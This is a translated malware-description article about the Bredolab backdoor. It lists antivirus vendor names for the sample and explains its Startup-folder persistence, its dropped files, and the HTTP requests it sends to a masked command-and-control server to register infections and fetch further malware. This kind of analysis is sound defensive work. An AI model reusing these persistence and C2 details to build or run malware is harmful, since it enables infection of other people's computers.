Learn about Backdoor.Win32.Bredolab.eua malware
The concept of backdoor is used to refer to malware, created to install and distribute malicious code to users' computers ...
QuanTriMang.com - The concept of backdoor is used to refer to malicious software, created to install and distribute malicious code to the user's computer . In terms of functions and techniques, the Backdoor is quite similar to the software management and coordination system. These malicious applications were created to do whatever the hackers wanted: to send and receive data, activate, use and delete any file, display error messages, and restart automatically. computer …
Such programs are often used to link infected computer groups to create common botnet or zombie models. And the people behind this organization can easily gather a large or large number of computers - this has now become a tool for hackers, in order to carry out bad schemes or purposes.
Another Backdoor unit is also capable of spreading and acting exactly like the Net-Worm, we can distinguish them through the ability to spread, Backdoor cannot replicate and spread, in stark contrast to Net-Worm. But just by receiving a special command from the hackers, they will simultaneously spread and produce in an uncontrollable amount.
In this article, we will discuss Backdoor.Win32.Bredolab.eua (named by Kaspersky), or also known as:
- Trojan: Bredolab! N (McAfee)
- Mal / BredoPk-B (Sophos)
- Trj / Sinowal.DW (Panda)
- TrojanDownloader: Win32 / Bredolab.AA (MS (OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32 / TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR / Crypt.XPACK.Gen (AVIRA)
- W32 / Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)
They were discovered on June 3, 2010 at 16:16 GMT, the 'move' operated at 4/6/2010 at 3:28 GMT, and detailed analysis information was posted on 12/12 7/2010 at 11:33 GMT.
Detailed technical description
In essence, malicious programs like this are often managed by a private server, and are responsible for downloading other malware to the infected computer.
Like all other malicious programs, they activate the same boot mechanism by copying the executable file to the autorun folder:
% Startup% siszpe32.exe
and create files that look like this:
% appdata% avdrn.dat
Regarding the Payload method, they often connect to the server:
http:///*****lo.ru
where they send the following requests:
GET /new/controller.php?action=bot&entity_list=&
uid = & first = 1 & guid = 880941764 & v = 15 & rnd = 8520045
As a result, the program will receive specific commands and codes to download other malware applications, they will be saved in the following folder and automatically activated:
% windir% Temp.exe
Then they continue to send other requests:
GET /new/controller.php?
action = report & guid = 0 & rnd = 8520045 & guid = & entity = 1260187840: unique_start;
1260188029: unique_start; 1260433697: unique_start; 1260199741: unique_start
These data inform the server system that the victim's computer has been infected.
You should read it
- Kaspersky's free support security utilities
- Top 12 most dangerous backdoor in computer history
- What is Malware HackTool:Win32/Keygen? How to remove?
- Information about Gpcode.ak virus
- Overview of Virus.Win32.Virut.ce malware pattern
- Steps to root Win32 virus: Expiro
- What is backdoor?
- The new Gazer - the back door targets the ministries and embassies around the world
- Find out about Virus.Win32.Sality.ag template
- Learn about the sample Rootkit.Win32.Stuxnet.a
- Overview of sample Net-Worm.Win32.Kido.ih
- Description of template Trojan-PSW.Win32.Qbot.mk